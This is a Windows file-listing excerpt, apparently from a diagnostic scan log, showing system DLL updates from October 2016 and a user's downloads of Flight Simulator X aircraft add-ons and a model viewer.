2016-10-15 09:35 - 2016-10-15 09:35 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel
2016-10-15 09:32 - 2016-10-15 09:32 - 02200036 _____ C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel.zip
2016-10-15 09:18 - 2016-10-15 09:18 - 28339782 _____ C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an.zip
2016-10-15 09:18 - 2016-10-15 09:18 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an
2016-10-15 09:07 - 2016-10-15 09:08 - 55849165 _____ C:\Users\Kyle Aniel\Downloads\SkySpirit-PSS-B777-300ER-Merge.rar
2016-10-15 09:07 - 2016-10-15 09:07 - 10424790 _____ C:\Users\Kyle Aniel\Downloads\SKYSPIRIT2012 777-300ER American Airlines N717AN 2013.rar
2016-10-15 07:57 - 2016-10-15 07:57 - 00018081 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-777-300-expansion-models.torrent
2016-10-14 23:46 - 2016-10-14 23:46 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83
2016-10-14 23:44 - 2016-10-14 23:46 - 67436368 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83.zip
2016-10-14 23:16 - 2016-10-14 23:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Microsoft_Flight_Simulator_X_Deluxe_Edition
2016-10-14 22:55 - 2016-10-14 22:55 - 03794912 _____ C:\Users\Kyle Aniel\Downloads\MJ772BHC.zip
2016-10-14 22:55 - 2016-10-14 22:55 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MJ772BHC
2016-10-14 22:53 - 2016-10-14 22:53 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\em77fsx
2016-10-14 22:44 - 2016-10-14 22:50 - 16805219 _____ C:\Users\Kyle Aniel\Downloads\em77fsx.zip
2016-10-13 21:00 - 2016-10-13 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLS Boeing 747-200 v1
2016-10-13 20:38 - 2016-10-18 19:38 - 00001243 _____ C:\Users\banie_000\Desktop\Jed's Half-Life Model Viewer.lnk
2016-10-13 20:38 - 2016-10-13 20:38 - 00195825 _____ C:\Users\Kyle Aniel\Downloads\hlmv136_setup.zip
2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\hlmv136_setup
2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jed's Half-Life Model Viewer 1.3.6
2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Program Files (x86)\Jed's Half-Life Model Viewer 1.3.6
2016-10-13 20:36 - 2016-10-13 20:36 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Blender Foundation
2016-10-13 19:26 - 2016-10-13 19:26 - 00000210 _____ C:\MD81_.ini
2016-10-13 17:24 - 2016-10-13 17:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995
2016-10-13 17:21 - 2016-10-13 17:21 - 04526316 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995.rar
2016-10-13 17:16 - 2016-10-13 17:21 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC4
2016-10-13 17:16 - 2016-10-13 17:16 - 03988172 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.zip
2016-10-13 16:53 - 2016-10-18 19:38 - 00001644 _____ C:\Users\banie_000\Desktop\Where are the manuals.doc.lnk
2016-10-13 16:53 - 2016-10-18 19:38 - 00001614 _____ C:\Users\banie_000\Desktop\RFP June Update.doc.lnk
2016-10-13 16:51 - 2016-10-13 16:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004
2016-10-13 15:28 - 2016-10-05 03:34 - 01051104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-10-13 15:28 - 2016-10-05 03:34 - 00894088 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-10-13 15:28 - 2016-10-05 03:31 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-10-13 15:28 - 2016-10-05 03:31 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-10-13 15:28 - 2016-10-05 03:31 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-10-13 15:28 - 2016-10-05 03:17 - 01322848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2016-10-13 15:28 - 2016-10-05 03:13 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-10-13 15:28 - 2016-10-05 03:13 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-10-13 15:28 - 2016-10-05 03:13 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-10-13 15:28 - 2016-10-05 03:12 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-10-13 15:28 - 2016-10-05 03:12 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-10-13 15:28 - 2016-10-05 03:09 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-10-13 15:28 - 2016-10-05 03:09 - 00064352 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-10-13 15:28 - 2016-10-05 03:03 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-10-13 15:28 - 2016-10-05 02:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-10-13 15:28 - 2016-10-05 02:50 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-10-13 15:28 - 2016-10-05 02:46 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-10-13 15:28 - 2016-10-05 02:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-10-13 15:28 - 2016-10-05 02:45 - 20965240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-10-13 15:28 - 2016-10-05 02:44 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-10-13 15:28 - 2016-10-05 02:41 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-10-13 15:28 - 2016-10-05 02:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-10-13 15:28 - 2016-10-05 02:38 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2016-10-13 15:28 - 2016-10-05 02:36 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-13 15:28 - 2016-10-05 02:35 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll
2016-10-13 15:28 - 2016-10-05 02:35 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-10-13 15:28 - 2016-10-05 02:35 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-10-13 15:28 - 2016-10-05 02:34 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-10-13 15:28 - 2016-10-05 02:33 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-10-13 15:28 - 2016-10-05 02:33 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-10-13 15:28 - 2016-10-05 02:33 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-10-13 15:28 - 2016-10-05 02:33 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2016-10-13 15:28 - 2016-10-05 02:32 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-10-13 15:28 - 2016-10-05 02:32 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-10-13 15:28 - 2016-10-05 02:32 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-10-13 15:28 - 2016-10-05 02:31 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-10-13 15:28 - 2016-10-05 02:31 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-10-13 15:28 - 2016-10-05 02:31 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-10-13 15:28 - 2016-10-05 02:31 - 00425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2016-10-13 15:28 - 2016-10-05 02:30 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2016-10-13 15:28 - 2016-10-05 02:29 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-10-13 15:28 - 2016-10-05 02:29 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2016-10-13 15:28 - 2016-10-05 02:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2016-10-13 15:28 - 2016-10-05 02:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2016-10-13 15:28 - 2016-10-05 02:27 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-10-13 15:28 - 2016-10-05 02:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-10-13 15:28 - 2016-10-05 02:26 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-10-13 15:28 - 2016-10-05 02:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-10-13 15:28 - 2016-10-05 02:26 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2016-10-13 15:28 - 2016-10-05 02:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-10-13 15:28 - 2016-10-05 02:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll
2016-10-13 15:28 - 2016-10-05 02:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2016-10-13 15:28 - 2016-10-05 02:25 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-10-13 15:28 - 2016-10-05 02:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-10-13 15:28 - 2016-10-05 02:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2016-10-13 15:28 - 2016-10-05 02:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-10-13 15:28 - 2016-10-05 02:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-10-13 15:28 - 2016-10-05 02:24 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-10-13 15:28 - 2016-10-05 02:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2016-10-13 15:28 - 2016-10-05 02:24 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll
2016-10-13 15:28 - 2016-10-05 02:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-10-13 15:28 - 2016-10-05 02:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2016-10-13 15:28 - 2016-10-05 02:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2016-10-13 15:28 - 2016-10-05 02:23 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-10-13 15:28 - 2016-10-05 02:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-10-13 15:28 - 2016-10-05 02:22 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-10-13 15:28 - 2016-10-05 02:21 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-10-13 15:28 - 2016-10-05 02:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-10-13 15:28 - 2016-10-05 02:21 - 01364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2016-10-13 15:28 - 2016-10-05 02:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-10-13 15:28 - 2016-10-05 02:20 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-10-13 15:28 - 2016-10-05 02:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2016-10-13 15:28 - 2016-10-05 02:20 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-10-13 15:28 - 2016-10-05 02:19 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2016-10-13 15:28 - 2016-10-05 02:19 - 02265088 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-10-13 15:28 - 2016-10-05 02:19 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-10-13 15:28 - 2016-10-05 02:19 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-10-13 15:28 - 2016-10-05 02:18 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-10-13 15:28 - 2016-10-05 02:18 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-10-13 15:28 - 2016-10-05 02:18 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-10-13 15:28 - 2016-10-05 02:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-10-13 15:28 - 2016-10-05 02:18 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-10-13 15:28 - 2016-10-05 02:17 - 08126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-10-13 15:28 - 2016-10-05 02:17 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-10-13 15:28 - 2016-10-05 02:17 - 01493504 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-10-13 15:28 - 2016-10-05 02:16 - 19418624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-10-13 15:28 - 2016-10-05 02:16 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-10-13 15:28 - 2016-10-05 02:16 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-10-13 15:28 - 2016-10-05 02:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-10-13 15:28 - 2016-10-05 02:15 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-10-13 15:28 - 2016-10-05 02:15 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-10-13 15:28 - 2016-10-05 02:15 - 01980416 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-10-13 15:28 - 2016-10-05 02:15 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-10-13 15:28 - 2016-10-05 02:15 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-10-13 15:28 - 2016-10-05 02:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 02667520 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 01778176 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2016-10-13 15:28 - 2016-10-05 02:12 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-10-13 15:28 - 2016-10-05 02:12 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-10-13 15:28 - 2016-10-05 02:12 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-10-13 15:28 - 2016-10-05 02:11 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-10-13 15:28 - 2016-10-05 02:11 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-10-13 15:28 - 2016-10-05 02:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-10-13 15:28 - 2016-10-05 02:11 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-10-13 15:28 - 2016-10-05 02:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-10-13 15:28 - 2016-10-05 02:09 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-10-13 15:28 - 2016-10-05 02:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-10-13 15:28 - 2016-10-05 02:09 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-10-13 15:28 - 2016-10-05 02:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-10-13 15:28 - 2016-10-05 02:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-10-13 15:28 - 2016-10-05 02:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-10-13 15:28 - 2016-10-05 02:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-10-13 15:28 - 2016-10-05 02:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-10-13 15:28 - 2016-10-05 02:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-10-13 15:28 - 2016-10-05 02:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-10-13 15:28 - 2016-10-05 02:06 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-10-13 15:28 - 2016-10-05 02:06 - 02254336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-10-13 15:28 - 2016-10-05 02:06 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2016-10-13 15:28 - 2016-10-05 02:06 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-10-13 15:28 - 2016-10-05 02:06 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-10-13 15:28 - 2016-10-05 02:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-10-13 15:28 - 2016-10-05 02:06 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-10-13 15:28 - 2016-10-05 02:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-10-13 15:28 - 2016-10-05 02:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-10-13 15:28 - 2016-09-06 22:34 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-10-13 15:27 - 2016-10-05 03:35 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-10-13 15:27 - 2016-10-05 03:33 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2016-10-13 15:27 - 2016-10-05 03:30 - 07812448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-10-13 15:27 - 2016-10-05 03:22 - 01181536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-10-13 15:27 - 2016-10-05 03:16 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-10-13 15:27 - 2016-10-05 03:12 - 01112928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-10-13 15:27 - 2016-10-05 03:09 - 04129928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-10-13 15:27 - 2016-10-05 03:09 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-10-13 15:27 - 2016-10-05 03:09 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-10-13 15:27 - 2016-10-05 03:08 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-10-13 15:27 - 2016-10-05 03:04 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-10-13 15:27 - 2016-10-05 03:04 - 00628032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-10-13 15:27 - 2016-10-05 02:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2016-10-13 15:27 - 2016-10-05 02:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-10-13 15:27 - 2016-10-05 02:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-10-13 15:27 - 2016-10-05 02:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-10-13 15:27 - 2016-10-05 02:36 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2016-10-13 15:27 - 2016-10-05 02:36 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-10-13 15:27 - 2016-10-05 02:35 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2016-10-13 15:27 - 2016-10-05 02:35 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-10-13 15:27 - 2016-10-05 02:34 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-10-13 15:27 - 2016-10-05 02:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-10-13 15:27 - 2016-10-05 02:31 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-10-13 15:27 - 2016-10-05 02:31 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-10-13 15:27 - 2016-10-05 02:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll
2016-10-13 15:27 - 2016-10-05 02:29 - 09129984 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-10-13 15:27 - 2016-10-05 02:29 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-10-13 15:27 - 2016-10-05 02:29 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-10-13 15:27 - 2016-10-05 02:28 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-10-13 15:27 - 2016-10-05 02:28 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-10-13 15:27 - 2016-10-05 02:28 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-10-13 15:27 - 2016-10-05 02:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2016-10-13 15:27 - 2016-10-05 02:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-13 15:27 - 2016-10-05 02:26 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-10-13 15:27 - 2016-10-05 02:23 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-10-13 15:27 - 2016-10-05 02:22 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-10-13 15:27 - 2016-10-05 02:22 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-10-13 15:27 - 2016-10-05 02:22 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2016-10-13 15:27 - 2016-10-05 02:21 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-10-13 15:27 - 2016-10-05 02:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2016-10-13 15:27 - 2016-10-05 02:20 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-10-13 15:27 - 2016-10-05 02:18 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-10-13 15:27 - 2016-10-05 02:17 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-10-13 15:27 - 2016-10-05 02:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adsmsext.dll
2016-10-13 15:27 - 2016-10-05 02:16 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-10-13 15:27 - 2016-10-05 02:16 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-10-13 15:27 - 2016-10-05 02:15 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-10-13 15:27 - 2016-10-05 02:15 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-10-13 15:27 - 2016-10-05 02:15 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-10-13 15:27 - 2016-10-05 02:15 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-10-13 15:27 - 2016-10-05 02:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2016-10-13 15:27 - 2016-10-05 02:14 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-10-13 15:27 - 2016-10-05 02:14 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-10-13 15:27 - 2016-10-05 02:11 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
